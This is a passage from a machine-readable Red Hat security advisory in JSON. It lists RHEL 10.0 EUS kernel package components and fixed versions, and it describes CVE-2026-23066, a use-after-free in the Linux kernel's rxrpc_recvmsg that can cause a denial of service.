"product_id": "RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-23066",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2026-02-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436805"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. A local unprivileged process can exploit an unsafe requeue path in the `rxrpc_recvmsg` function by using `AF_RXRPC` sockets with `MSG_DONTWAIT` and `MSG_PEEK` flags. This improper handling of the receive message queue can lead to memory corruption, such as Use-After-Frees (UAFs) or reference count underruns. The most likely outcome is a kernel crash or memory safety warning, resulting in a denial of service. There is also a conservative possibility of broader impact if the memory corruption is exploitable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Denial of Service via unsafe requeue in rxrpc_recvmsg",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An unsafe requeue path in rxrpc_recvmsg can corrupt the recvmsg queue because a call is requeued unconditionally even if it is already on the queue due to MSG_PEEK or a concurrent IO thread requeue. This can corrupt the linked list bookkeeping and can manifest as use after free or refcount underrun in RXRPC call objects. The most likely outcome is a kernel crash or memory safety warning which results in denial of service. For the CVSS the PR is N because a local unprivileged process can trigger the behavior by using AF_RXRPC sockets and recvmsg with MSG_DONTWAIT and MSG_PEEK patterns. The issue is not directly network reachable as a pure remote packet trigger because the vulnerable operation is in the local recvmsg path. Remote traffic can influence timing and queue state but a local caller is still needed to exercise the buggy logic. Impact is primarily availability with a conservative possibility of broader impact if the memory corruption is exploitable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
